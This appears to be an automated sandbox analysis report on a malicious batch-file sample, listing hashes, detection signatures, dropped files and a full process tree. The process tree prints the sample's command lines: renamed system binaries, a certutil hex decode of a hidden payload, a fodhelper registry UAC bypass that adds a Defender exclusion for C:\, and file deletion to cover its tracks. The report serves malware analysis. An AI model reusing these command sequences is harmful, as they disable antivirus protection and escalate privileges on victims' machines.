Analysis
- max time kernel: 141s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 07-06-2024 01:10
Static task: static1
Behavioral task: behavioral1
- Sample: 1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
- Resource: win7-20240215-en
Behavioral task: behavioral2
- Sample: 1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
- Resource: win10v2004-20240508-en
General
- Target: 1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
- Size: 3.0MB
- MD5: 17c7045b36fae5916e2900899e40fcdc
- SHA1: 793de1034b8dbce1547b85d7348324e8fb5d0106
- SHA256: 1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
- SHA512: f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
- SSDEEP: 49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x
Malware Config
Signatures

- Executes dropped EXE (24 IoCs)

Processes:

| PID | Process |
|---|---|
| 1988 | alpha.exe |
| 2884 | alpha.exe |
| 2880 | alpha.exe |
| 2556 | alpha.exe |
| 2612 | kn.exe |
| 2476 | alpha.exe |
| 2072 | alpha.exe |
| 2596 | alpha.exe |
| 1652 | alpha.exe |
| 2400 | xkn.exe |
| 2472 | alpha.exe |
| 2860 | ger.exe |
| 2192 | alpha.exe |
| 2144 | kn.exe |
| 624 | alpha.exe |
| 1984 | Ping_c.pif |
| 2644 | alpha.exe |
| 1716 | alpha.exe |
| 1504 | alpha.exe |
| 1720 | alpha.exe |
| 2680 | alpha.exe |
| 1556 | alpha.exe |
| 1892 | alpha.exe |
| 1452 | alpha.exe |

- Loads dropped DLL (23 IoCs)

Processes (consecutive identical entries grouped, count given in the first column):

| Count | PID | Process |
|---|---|---|
| 4 | 1844 | cmd.exe |
| 1 | 2556 | alpha.exe |
| 4 | 1844 | cmd.exe |
| 1 | 1652 | alpha.exe |
| 3 | 2400 | xkn.exe |
| 1 | 2472 | alpha.exe |
| 1 | 1844 | cmd.exe |
| 1 | 2192 | alpha.exe |
| 5 | 1844 | cmd.exe |
| 2 | 1964 | WerFault.exe |

- Enumerates physical storage devices (1 TTPs)

Attempts to interact with connected storage/optical drive(s).

- Program crash (1 IoCs)

Processes:

| PID | Process | Target PID | Target process |
|---|---|---|---|
| 1964 | WerFault.exe | 1984 | Ping_c.pif |

- Kills process with taskkill (1 IoCs)

Processes:

| PID | Process |
|---|---|
| 880 | taskkill.exe |

- Modifies registry class (5 IoCs)

Processes:

| Description | IoC | Process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open | ger.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | ger.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open\command | ger.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings | ger.exe |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell | ger.exe |

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)

Processes:

| PID | Process |
|---|---|
| 1984 | Ping_c.pif |

- Suspicious behavior: EnumeratesProcesses (1 IoCs)

Processes:

| PID | Process |
|---|---|
| 2400 | xkn.exe |

- Suspicious use of AdjustPrivilegeToken (2 IoCs)

Processes:

| Description | PID | Process |
|---|---|---|
| Token: SeDebugPrivilege | 2400 | xkn.exe |
| Token: SeDebugPrivilege | 880 | taskkill.exe |

- Suspicious use of WriteProcessMemory (64 IoCs)

Processes (consecutive identical entries grouped, count given in the first column):

| Count | PID | Process | Target PID | Target process |
|---|---|---|---|---|
| 3 | 1844 | cmd.exe | 2936 | extrac32.exe |
| 3 | 1844 | cmd.exe | 1988 | alpha.exe |
| 3 | 1844 | cmd.exe | 2884 | alpha.exe |
| 3 | 1844 | cmd.exe | 2880 | alpha.exe |
| 3 | 2880 | alpha.exe | 2480 | extrac32.exe |
| 3 | 1844 | cmd.exe | 2556 | alpha.exe |
| 3 | 2556 | alpha.exe | 2612 | kn.exe |
| 3 | 1844 | cmd.exe | 2476 | alpha.exe |
| 3 | 2476 | alpha.exe | 2600 | extrac32.exe |
| 3 | 1844 | cmd.exe | 2072 | alpha.exe |
| 3 | 2072 | alpha.exe | 2468 | extrac32.exe |
| 3 | 1844 | cmd.exe | 2596 | alpha.exe |
| 3 | 2596 | alpha.exe | 2856 | extrac32.exe |
| 3 | 1844 | cmd.exe | 1652 | alpha.exe |
| 3 | 1652 | alpha.exe | 2400 | xkn.exe |
| 3 | 2400 | xkn.exe | 2472 | alpha.exe |
| 3 | 2472 | alpha.exe | 2860 | ger.exe |
| 3 | 1844 | cmd.exe | 2192 | alpha.exe |
| 3 | 2192 | alpha.exe | 2144 | kn.exe |
| 3 | 1844 | cmd.exe | 624 | alpha.exe |
| 3 | 624 | alpha.exe | 880 | taskkill.exe |
| 1 | 1844 | cmd.exe | 1984 | Ping_c.pif |
Processes

Process tree (indentation shows the parent/child level; each image path is followed by its command line and the signatures that matched it):

- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\extrac32.exe
    C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
      Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Public\xkn.exe
      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Public\alpha.exe
        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - C:\Users\Public\ger.exe
          C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
          Signatures: Executes dropped EXE; Modifies registry class
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
      Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SystemSettings.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Public\Libraries\Ping_c.pif
    C:\Users\Public\Libraries\Ping_c.pif
    Signatures: Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam
    - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 680
      Signatures: Loads dropped DLL; Program crash
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

- C:\Users\Public\Libraries\Ping_c.pif
  - Filesize: 1.1MB
  - MD5: 962c746f045885ca2883fec129a5bb98
  - SHA1: bdad34f489b6a8b3a3101d658ea426805e859473
  - SHA256: 8b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71
  - SHA512: 45cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83

- C:\Users\Public\Ping_c.mp4
  - Filesize: 2.2MB
  - MD5: 18fbc4b3cab1f954789cf7649dcd1dff
  - SHA1: 661ba52bd44e913cd74b214e1652843f1f894e1c
  - SHA256: 4bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a
  - SHA512: de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3

- C:\Users\Public\alpha.exe
  - Filesize: 337KB
  - MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  - SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  - SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  - SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

- C:\Users\Public\ger.exe
  - Filesize: 73KB
  - MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
  - SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
  - SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
  - SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

- C:\Users\Public\kn.exe
  - Filesize: 1.1MB
  - MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
  - SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
  - SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
  - SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

- C:\Users\Public\xkn.exe
  - Filesize: 462KB
  - MD5: 852d67a27e454bd389fa7f02a8cbe23f
  - SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  - SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  - SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

- memory/1984-78-0x0000000000400000-0x0000000000522000-memory.dmp
  - Filesize: 1.1MB

- memory/2400-44-0x0000000001CD0000-0x0000000001CD8000-memory.dmp
  - Filesize: 32KB

- memory/2400-43-0x000000001B420000-0x000000001B702000-memory.dmp
  - Filesize: 2.9MB